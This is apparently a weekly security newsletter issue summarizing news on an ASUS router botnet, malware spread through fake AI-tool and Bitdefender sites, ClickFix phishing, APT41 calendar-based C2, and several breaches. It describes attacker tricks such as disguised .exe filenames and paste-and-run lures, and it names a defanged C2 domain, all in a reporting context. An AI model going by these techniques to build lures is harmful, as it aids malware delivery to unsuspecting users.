Read Time: 8 minutes

Today’s sponsor ….me!:

I randomly found myself in Bastrop, TX this weekend and found myself in Ryan Holiday’s bookstore. I’ve wanted to check it out for a bit as I’ve read a number of his books and am generally a fan of his work. It was worth the drop in and I bought some books to support a local shop, including “Everything is Tuberculosis” by John Green, which I’m excited to read.

ICYMI

🖊️ Something I wrote: Tim Cook personally called TX Gov Abbott urging changes/veto to new online child safety bill. Bill would require Apple to implement age verification for all device owners.

🎧️ Something I heard: Blake Scholl interviewed about he went from high school dropout to Groupon to the founder of a supersonic jet startup. - I used to live in the flight path of the old Concorde jets landing and always loved seeing them. Was fun to listen to the story of how he’s trying to bring them back.

🎤 Something I said: Did ChatGPT just find it's first zero day???

🔖 Something I read: Claude 4 Opus vs. Gemini 2.5 pro vs. OpenAI o3: Coding comparison

Vulnerable News

AyySSHush: Tradecraft of an emergent ASUS botnet

GreyNoise caught a pretty slick ASUS router botnet using their AI traffic analysis tool called SIFT. The attackers are chaining together brute force attacks, auth bypass tricks, and command injection to plant SSH backdoors on thousands of routers. They're using ASUS's own official SSH settings to install their public key, which means the backdoor survives firmware updates even after the original vulns get patched.

The attack flow exploits CVE-2023-39780 to create a file that enables TrendMicro's bandwidth logging feature, then leverage that for more command injection opportunities. They've found over a ton of compromised hosts so far. GreyNoise’s sensor grid and a Censys census put the tally at ~9 k backdoored routers and climbing (up from ~4.8 k in March). All with SSH running on port 53282 and the same attacker-controlled key installed.

ASUS did try to patch the OAuth vulnerability, but the researchers found the fix might not be complete. If you've got an ASUS router exposed to the internet, might be time to check if you've got an unexpected SSH service running. (read more)

Turn complex security tech into clear demand

You might’ve missed this, but I’ve been building an agency behind the scenes at Vulnerable U. We’ve been helping dozens of security companies connect with the security community in a meaningful way.

Technically credible content is our bread and butter at Vulnerable Media, a crew of hackers, practitioners, marketing experts, and storytellers. We turn deep technical features into messages that buyers understand and want to connect with. We understand your customer, because we’ve been your customer. Imagine having a CISO in the room with you as you craft your GTM strategy.

Need launch buzz, ongoing thought-leadership, or a full content engine? We plug in fast, write in your voice, and keep the cringe on mute. See what effective, practitioner driven, security marketing feels like. You won’t need to teach us how to spell Kubernetes.

👉 What can we do for you?

Another Suspect Is Charged in Bitcoin Kidnapping and Torture Case

Another crypto crime story, this time it’s absolutely bananas. A third suspect just surrendered in that wild Bitcoin kidnapping case out of Manhattan. William Duplessie, 33, turned himself in Tuesday after days of negotiations with NYPD, joining John Woeltz who was nabbed Friday. They're accused of holding a man captive for nearly three weeks(?!) in a $75k/month NoLIta townhouse, subjecting him to some horrific torture to get his Bitcoin wallet password.

The victim, Michael Carturan, who appears to have been a security auditor in crypto, finally escaped on Friday and flagged down a traffic agent. According to police, these guys went medieval. Using electrical shocks, whipping with guns, forced crack smoking, and even dangling him from the fifth floor. Investigators found photos of the torture plus weapons when they searched the place. (read more)

Fake AI Video Generators Deliver Rust-Based Malware via Malicious Ads

Here's a clever one - Vietnamese cybercriminals, UNC6032, have been flooding Facebook and LinkedIn with fake AI video generator ads for the past year. They're copying popular tools like Luma AI and Kling AI, setting up convincing landing pages that look legit, then serving up malware-stuffed ZIP files to anyone curious enough to "try the demo." No exploits needed when you've got AI hype doing the heavy lifting. Google counted 30+ domains and over 2.3 million ad views in the EU alone.

Funny trick they use in the file name. .mp4 (a couple dozen spaces) .exe

The infection chain is pretty gnarly. A Rust-based dropper called STARKVEIL, followed by Python loaders and three different payloads (GRIMPULL, XWORM, FROSTRIFT) that steal everything from browser cookies to crypto wallet extensions. They're targeting marketing agencies, media outlets, and small businesses, where someone is inevitably going to click "generate video.” They're even using the stolen credentials to buy more malicious ads, creating a self-funding cycle. (read more)

ConnectWise Breach - ScreenConnect Hit by Nation State Hackers

ConnectWise just got popped by what they're calling a "sophisticated nation state actor" in their ScreenConnect cloud environment. They brought in Mandiant, notified the handful of affected customers, and are claiming it was a tight, limited breach with no ongoing activity. The usual playbook stuff - enhanced monitoring, MFA requirements, and pushing everyone to upgrade to version 25.2.4.

Here's the problem though: ConnectWise is being frustratingly vague about the actual details. No IOCs shared, no specifics about what was actually vulnerable, and a "trust us, we fixed it" approach. For MSPs who rely on ScreenConnect to manage thousands of endpoints, this lack of transparency is a real issue. You can't hunt for threats when you don't know what to look for. (read more)

APT41 Uses Google Calendar Events for C2

Everything is a Command & Control server if you try hard enough!

The Chinese state-sponsored group, APT41, got creative this time, using Google Calendar as their command and control infrastructure for a malware called "TOUGHPROGRESS." They compromised a government website to host their payload, then sent spear phishing emails with fake customs declaration PDFs. The malware itself has a three-stage deployment with process hollowing, encryption, and some clever obfuscation techniques that overflow 64-bit registers to hide function calls.

They're abusing legitimate cloud services to blend in with normal traffic. The malware creates calendar events with encrypted commands and results hidden in the descriptions, using hardcoded dates to communicate.

Google wasn't having it and developed custom fingerprints to identify and nuke the attacker-controlled calendars, terminated the Workspace projects, and updated Safe Browsing to block the malicious domains. It's part of a broader pattern where APT41 keeps trying to abuse Google services like Sheets and Drive for C2, only to get shut down each time. (read more)

LexisNexis Informs 360K+ Customers of Third-Party Data Leak

LexisNexis Risk Solutions just disclosed a breach affecting over 364,000 customers, but it’s a breach with a twist! Their own systems weren't touched. Instead, an unauthorized party grabbed customer data from a third-party platform that turned out to be GitHub. The breach happened back on Christmas Day, but they didn't find out until April 1st, which is quite the discovery delay.

The compromised data includes the usual suspects: names, addresses, SSNs, driver's license numbers, and dates of birth. LexisNexis is being somewhat coy about GitHub in their official breach notices, just calling it a "third-party platform used for software development." No threat group has claimed responsibility yet, and there's no evidence the data's been misused. They're offering the standard two years of credit monitoring. (read more)

Threat actors abuse Google Apps Script in evasive phishing attacks

Phishers found a new trick - they're abusing Google Apps Script to host their fake login pages. Since these pages live on script.google.com, they look totally legit and sail right past most security filters that whitelist Google domains. Cofense spotted this trend where attackers send invoice or tax-themed phishing emails that link to these Google-hosted credential thieves.

The beauty of this approach (from the attacker's perspective) is that anyone can publish a script as a public web app and get a Google domain for free. After victims enter their creds, they get redirected to the real service to keep suspicions low. Your best defense here is probably configuring email security to be more suspicious of cloud service links, or just blocking Google Apps Script URLs entirely if you can swing it. (read more)

Detecting an email-based ClickFix attack that delivers DCRat malware payload

I’ve been talking about ClickFix a TON lately. (Just check my YouTube out)

This one starts with a fake email thread about apartment rentals through Booking.com. The attacker poses as someone whose colleague got sick and handed off the rental booking task, asking the target to verify some accommodation surcharge info through a malicious link. Pretty believable social engineering, honestly.

The fun part is the execution method. After a real Cloudflare CAPTCHA, victims hit a fake one that automatically copies a PowerShell script to their clipboard when they click it. Then it literally gives them step-by-step instructions: press Windows+R, paste with Ctrl+V, and hit Enter. If they follow through, boom - they've just downloaded and executed DCRat malware. This write-up is how you can catch this attack with Sublime's AI detection, which flags multiple red flags, including the newly registered domain, brand impersonation, and fake email thread. (read more)

Britain will increase cyberattacks against Russia and China

The UK just dropped the diplomatic niceties around cyberwarfare. Defense Secretary John Healey straight-up admitted (announced?) they're ramping up offensive cyberattacks against Russia and China, saying "the keyboard is now a weapon of war." This is pretty unprecedented - ministers have never been this explicit about launching cyberattacks against state actors before. They're standing up a new cyber command under General Sir James Hockenhull to coordinate these digital offensive capabilities, and throwing over £1 billion at a "digital targeting web" system.

The numbers behind this are telling. The MoD has faced 90,000 cyberattacks from state-linked sources in the past two years, which is double what they saw in the previous period. These numbers are always hard to take seriously. What do they deem an “attack?” A port scan? Who knows.

Healey's basically saying the gloves are off and they're moving from defense to offense. The Strategic Defense Review drops on Monday, and it appears that cyber and autonomous systems will be at the forefront. Makes sense given how much Ukraine has shown that future conflicts will be won by whoever can connect their forces better and strike faster. (read more)

New Windows RAT Evades Detection for Weeks Using Corrupted DOS and PE Headers

A new Windows RAT managed to fly under the radar for weeks by corrupting its DOS and PE headers - basically making itself look like garbage data while still being executable. Fortinet's IR team found it running in dllhost.exe after piecing together memory dumps from an infected machine. The RAT talks to its C2 over TLS (using "rushpapers[.]com") and can do the usual stuff - screenshots, service manipulation, plus it can accept inbound connections to turn the victim into a pivot point. They haven't figured out how it's spreading yet, but the multi-threaded design suggests the attackers want to use compromised systems as platforms for further attacks.

By mangling the headers that Windows uses to validate executables, the malware makes itself really hard to analyze while still maintaining functionality. (read more)

Fake Bitdefender website used to spread infostealer malware

A fake Bitdefender download page is pushing a ton of malware including VenomRAT, StormKitty, and SilentTrinity. DomainTools caught the operation which uses a convincing clone of Bitdefender's Windows download page to deliver the payload. It's a smart combo - StormKitty hunts for financial credentials and crypto wallets, while SilentTrinity maintains persistent backdoor access.

Bitdefender spotted this back in May and is working with Cloudflare to nuke the site, though attribution is tricky since VenomRAT is widely available as malware-as-a-service. The same threat actor is likely running similar campaigns impersonating banks and IT providers. (read more)

Miscellaneous mattjay

Parting Thoughts:

Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.

Stay safe, Matt Johansen
@mattjay